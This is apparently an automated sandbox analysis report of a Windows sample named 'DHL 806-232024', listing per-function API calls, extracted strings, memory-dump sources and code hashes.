                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Cursor$Load$ErrorInfoLast
                                                                                  • String ID:
                                                                                  • API String ID: 3215588206-0
                                                                                  • Opcode ID: 163f7eb3d468be947c5ef46d525a91f0046817df36641b17e2b36d0cab5e8113
                                                                                  • Instruction ID: 67f0fff8d178dad98fcd44aa0ef0b58ee516ee17cb7a084a7ffe71f7c2ac3f2b
                                                                                  • Opcode Fuzzy Hash: 163f7eb3d468be947c5ef46d525a91f0046817df36641b17e2b36d0cab5e8113
                                                                                  • Instruction Fuzzy Hash: 53415370E083196BDB109FBA8C49D6EFFB8EF51B50B10452BE509E7291DAB89401CE61
                                                                                  APIs
                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 0092AAA5
                                                                                  • __swprintf.LIBCMT ref: 0092AB46
                                                                                  • _wcscmp.LIBCMT ref: 0092AB59
                                                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0092ABAE
                                                                                  • _wcscmp.LIBCMT ref: 0092ABEA
                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 0092AC21
                                                                                  • GetDlgCtrlID.USER32(?), ref: 0092AC73
                                                                                  • GetWindowRect.USER32(?,?), ref: 0092ACA9
                                                                                  • GetParent.USER32(?), ref: 0092ACC7
                                                                                  • ScreenToClient.USER32(00000000), ref: 0092ACCE
                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 0092AD48
                                                                                  • _wcscmp.LIBCMT ref: 0092AD5C
                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 0092AD82
                                                                                  • _wcscmp.LIBCMT ref: 0092AD96
                                                                                    • Part of subcall function 008F386C: _iswctype.LIBCMT ref: 008F3874
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                  • String ID: %s%u
                                                                                  • API String ID: 3744389584-679674701
                                                                                  • Opcode ID: de095ad93c8ee894d1bbaad6d04f45f1706180af5e3919dc47c880c664c59643
                                                                                  • Instruction ID: 25909872810f6ad264a32c1b5cfc6adb52945e00fecb3b5574b9cbe8ab5d5aff
                                                                                  • Opcode Fuzzy Hash: de095ad93c8ee894d1bbaad6d04f45f1706180af5e3919dc47c880c664c59643
                                                                                  • Instruction Fuzzy Hash: C5A1E072204726AFDB14EF24E884BAAF7ECFF44315F104629F999D2194DB30E945CB92
                                                                                  APIs
                                                                                  • GetClassNameW.USER32(00000008,?,00000400), ref: 0092B3DB
                                                                                  • _wcscmp.LIBCMT ref: 0092B3EC
                                                                                  • GetWindowTextW.USER32(00000001,?,00000400), ref: 0092B414
                                                                                  • CharUpperBuffW.USER32(?,00000000), ref: 0092B431
                                                                                  • _wcscmp.LIBCMT ref: 0092B44F
                                                                                  • _wcsstr.LIBCMT ref: 0092B460
                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 0092B498
                                                                                  • _wcscmp.LIBCMT ref: 0092B4A8
                                                                                  • GetWindowTextW.USER32(00000002,?,00000400), ref: 0092B4CF
                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 0092B518
                                                                                  • _wcscmp.LIBCMT ref: 0092B528
                                                                                  • GetClassNameW.USER32(00000010,?,00000400), ref: 0092B550
                                                                                  • GetWindowRect.USER32(00000004,?), ref: 0092B5B9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                  • String ID: @$ThumbnailClass
                                                                                  • API String ID: 1788623398-1539354611
                                                                                  • Opcode ID: 46d8ef9e0effaa56854ea83898d2f999b2b90f5f557b63d6169919597972b78d
                                                                                  • Instruction ID: b5c92f45a5a59be1d9b3f221f40097d7daa4b500b02772e9492245d6785b9113
                                                                                  • Opcode Fuzzy Hash: 46d8ef9e0effaa56854ea83898d2f999b2b90f5f557b63d6169919597972b78d
                                                                                  • Instruction Fuzzy Hash: F081C0710083199BDB00DF14E885FAA7BECFF44324F18856AFD858A1AADB34DD45CBA1
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: __wcsnicmp
                                                                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                  • API String ID: 1038674560-1810252412
                                                                                  • Opcode ID: 9e49d7a38aa7afc9e78f408786ba5ea815bd712573ddb15f8ab502b41406ba12
                                                                                  • Instruction ID: 349b10a32f76477bc0ba07e59d61b1e32ff5a229b56d0547e2c650c75660292d
                                                                                  • Opcode Fuzzy Hash: 9e49d7a38aa7afc9e78f408786ba5ea815bd712573ddb15f8ab502b41406ba12
                                                                                  • Instruction Fuzzy Hash: BF31E331544329E6DB14FA64DD43EFE77A8FF20754F64051AB412B12D9FF116E04C652
                                                                                  APIs
                                                                                  • LoadIconW.USER32(00000063), ref: 0092C4D4
                                                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0092C4E6
                                                                                  • SetWindowTextW.USER32(?,?), ref: 0092C4FD
                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 0092C512
                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 0092C518
                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0092C528
                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 0092C52E
                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0092C54F
                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0092C569
                                                                                  • GetWindowRect.USER32(?,?), ref: 0092C572
                                                                                  • SetWindowTextW.USER32(?,?), ref: 0092C5DD
                                                                                  • GetDesktopWindow.USER32 ref: 0092C5E3
                                                                                  • GetWindowRect.USER32(00000000), ref: 0092C5EA
                                                                                  • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0092C636
                                                                                  • GetClientRect.USER32(?,?), ref: 0092C643
                                                                                  • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0092C668
                                                                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0092C693
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                  • String ID:
                                                                                  • API String ID: 3869813825-0
                                                                                  • Opcode ID: dce078018822b6618a0aeaf17117d98aec2f7c44c30151ed41b57390684ffb7b
                                                                                  • Instruction ID: edfbd3059b8f99149ec76eec8de9216169a7772d8e7e9c342b3ea8320f936587
                                                                                  • Opcode Fuzzy Hash: dce078018822b6618a0aeaf17117d98aec2f7c44c30151ed41b57390684ffb7b
                                                                                  • Instruction Fuzzy Hash: E8517A71900709AFDB209FA9DE89F6FBBF9FF04705F004928E686A25A4C775E904DB50
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 0095A4C8
                                                                                  • DestroyWindow.USER32(?,?), ref: 0095A542
                                                                                    • Part of subcall function 008D7D2C: _memmove.LIBCMT ref: 008D7D66
                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0095A5BC
                                                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0095A5DE
                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0095A5F1
                                                                                  • DestroyWindow.USER32(00000000), ref: 0095A613
                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,008D0000,00000000), ref: 0095A64A
                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0095A663
                                                                                  • GetDesktopWindow.USER32 ref: 0095A67C
                                                                                  • GetWindowRect.USER32(00000000), ref: 0095A683
                                                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0095A69B
                                                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0095A6B3
                                                                                    • Part of subcall function 008D25DB: GetWindowLongW.USER32(?,000000EB), ref: 008D25EC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                  • String ID: 0$tooltips_class32
                                                                                  • API String ID: 1297703922-3619404913
                                                                                  • Opcode ID: 32737b73eb9979a5e4b95c8c86bdd316f2109fd0d84481693cbcd4ba2fdbdc44
                                                                                  • Instruction ID: 54688f0d99a070ae1c5ccd2383360d3198596cd46d1264d92cc09ea6979d50ca
                                                                                  • Opcode Fuzzy Hash: 32737b73eb9979a5e4b95c8c86bdd316f2109fd0d84481693cbcd4ba2fdbdc44
                                                                                  • Instruction Fuzzy Hash: 7D71E174154309AFD720CF29DC59F6A7BEAFB88315F08062DF985872A0D770E90ADB16
                                                                                  APIs
                                                                                    • Part of subcall function 008D2612: GetWindowLongW.USER32(?,000000EB), ref: 008D2623
                                                                                  • DragQueryPoint.SHELL32(?,?), ref: 0095C917
                                                                                    • Part of subcall function 0095ADF1: ClientToScreen.USER32(?,?), ref: 0095AE1A
                                                                                    • Part of subcall function 0095ADF1: GetWindowRect.USER32(?,?), ref: 0095AE90
                                                                                    • Part of subcall function 0095ADF1: PtInRect.USER32(?,?,0095C304), ref: 0095AEA0
                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 0095C980
                                                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0095C98B
                                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0095C9AE
                                                                                  • _wcscat.LIBCMT ref: 0095C9DE
                                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0095C9F5
                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 0095CA0E
                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 0095CA25
                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 0095CA47
                                                                                  • DragFinish.SHELL32(?), ref: 0095CA4E
                                                                                  • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0095CB41
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                  • API String ID: 169749273-3440237614
                                                                                  • Opcode ID: 6fabbcd98335636c3065b8dd408aa876545cc7835ef76a646b57a00e4041376c
                                                                                  • Instruction ID: 4d44e8b9006a5d0432929c6b91610abe3b6ac66d9d717741e203a97ea7499a99
                                                                                  • Opcode Fuzzy Hash: 6fabbcd98335636c3065b8dd408aa876545cc7835ef76a646b57a00e4041376c
                                                                                  • Instruction Fuzzy Hash: 05615771108311AFC711EF69CC95E9BBBE8FF88754F000A2EF591922A1DB709A49CB52
                                                                                  APIs
                                                                                  • CharUpperBuffW.USER32(?,?), ref: 009546AB
                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 009546F6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharMessageSendUpper
                                                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                  • API String ID: 3974292440-4258414348
                                                                                  • Opcode ID: 4845cd0d99e6b75963ec32f7acac759e52ba8e0bd5791d0b204dc6e3a99e3f83
                                                                                  • Instruction ID: ff3b456205c0c297b7281687a8767c847984ff7c6d4df57b9e82d5ee678e7efa
                                                                                  • Opcode Fuzzy Hash: 4845cd0d99e6b75963ec32f7acac759e52ba8e0bd5791d0b204dc6e3a99e3f83
                                                                                  • Instruction Fuzzy Hash: 63917B342043159FCB14EF25C461A6ABBA5FF85318F04495DFC969B3A2CB34ED4ACB82
                                                                                  APIs
                                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0095BB6E
                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00959431), ref: 0095BBCA
                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0095BC03
                                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0095BC46
                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0095BC7D
                                                                                  • FreeLibrary.KERNEL32(?), ref: 0095BC89
                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0095BC99
                                                                                  • DestroyIcon.USER32(?,?,?,?,?,00959431), ref: 0095BCA8
                                                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0095BCC5
                                                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0095BCD1
                                                                                    • Part of subcall function 008F313D: __wcsicmp_l.LIBCMT ref: 008F31C6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                  • String ID: .dll$.exe$.icl
                                                                                  • API String ID: 1212759294-1154884017
                                                                                  • Opcode ID: 661a2f5ffcb670b7cf6b81b280283f1ed001c1ff28388c8ca989d2eb1571e435
                                                                                  • Instruction ID: a507c30a6f9bb4845098f6d3f3003213af750afcf94bb108adc12b2463bcb9ff
                                                                                  • Opcode Fuzzy Hash: 661a2f5ffcb670b7cf6b81b280283f1ed001c1ff28388c8ca989d2eb1571e435
                                                                                  • Instruction Fuzzy Hash: B5610271500219BAEB14DF69CC45FBE7BACFB08722F104219FD15D61C0DB74AA94DBA0
                                                                                  APIs
                                                                                    • Part of subcall function 008D9997: __itow.LIBCMT ref: 008D99C2
                                                                                    • Part of subcall function 008D9997: __swprintf.LIBCMT ref: 008D9A0C
                                                                                  • CharLowerBuffW.USER32(?,?), ref: 0093A636
                                                                                  • GetDriveTypeW.KERNEL32 ref: 0093A683
                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0093A6CB
                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0093A702
                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0093A730
                                                                                    • Part of subcall function 008D7D2C: _memmove.LIBCMT ref: 008D7D66
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                  • API String ID: 2698844021-4113822522
                                                                                  • Opcode ID: 42f9c32ccc3945c8fadc8a18085d29b719de01c4fa9e7fd349d1ca17f52f86e3
                                                                                  • Instruction ID: 366db89d8c7abf375c1cb473daf004bad58ada480267cb97eea26f188035c1f0
                                                                                  • Opcode Fuzzy Hash: 42f9c32ccc3945c8fadc8a18085d29b719de01c4fa9e7fd349d1ca17f52f86e3
                                                                                  • Instruction Fuzzy Hash: B35138711043059FD710EF24C89196AB7E8FF94718F044A6EF89697361EB35AE0ACB52
                                                                                  APIs
                                                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0093A47A
                                                                                  • __swprintf.LIBCMT ref: 0093A49C
                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0093A4D9
                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0093A4FE
                                                                                  • _memset.LIBCMT ref: 0093A51D
                                                                                  • _wcsncpy.LIBCMT ref: 0093A559
                                                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0093A58E
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0093A599
                                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 0093A5A2
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0093A5AC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                  • String ID: :$\$\??\%s
                                                                                  • API String ID: 2733774712-3457252023
                                                                                  • Opcode ID: 240514883a5a7f324089f8313e17712dc55e9bdb7cc81c5fec673563daf55dd3
                                                                                  • Instruction ID: 1501c0cda75ec97e8c5aa93bfd7981035b8d68018589f85215a56aad4fe07468
                                                                                  • Opcode Fuzzy Hash: 240514883a5a7f324089f8313e17712dc55e9bdb7cc81c5fec673563daf55dd3
                                                                                  • Instruction Fuzzy Hash: 5531BEB2604209ABDB219FA1DC48FEF33BCEF88751F1040B6FA08D6160EB7096448B25
                                                                                  APIs
                                                                                  • __wsplitpath.LIBCMT ref: 0093DC7B
                                                                                  • _wcscat.LIBCMT ref: 0093DC93
                                                                                  • _wcscat.LIBCMT ref: 0093DCA5
                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0093DCBA
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0093DCCE
                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 0093DCE6
                                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 0093DD00
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0093DD12
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                  • String ID: *.*
                                                                                  • API String ID: 34673085-438819550
                                                                                  • Opcode ID: 96a79ffec15e94ac1875da63fd8e4bedad1ab088aef873a9bbc545b345cae3f9
                                                                                  • Instruction ID: 90fdfcf1e6c905882c69ae68d4623716c7aa375a13199dbd8d48b5d3350ad353
                                                                                  • Opcode Fuzzy Hash: 96a79ffec15e94ac1875da63fd8e4bedad1ab088aef873a9bbc545b345cae3f9
                                                                                  • Instruction Fuzzy Hash: 6E8180725153459FCB24EF28D8659AAB7E8FB88310F198C2EF899C7250EB34D944CF52
                                                                                  APIs
                                                                                    • Part of subcall function 008D2612: GetWindowLongW.USER32(?,000000EB), ref: 008D2623
                                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0095C4EC
                                                                                  • GetFocus.USER32 ref: 0095C4FC
                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 0095C507
                                                                                  • _memset.LIBCMT ref: 0095C632
                                                                                  • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0095C65D
                                                                                  • GetMenuItemCount.USER32(?), ref: 0095C67D
                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 0095C690
                                                                                  • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0095C6C4
                                                                                  • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0095C70C
                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0095C744
                                                                                  • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0095C779
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                  • String ID: 0
                                                                                  • API String ID: 1296962147-4108050209
                                                                                  • Opcode ID: 332d54f03c12242f44831f097d01d9d882338de8b6e031abcbd8aa41f9d435d8
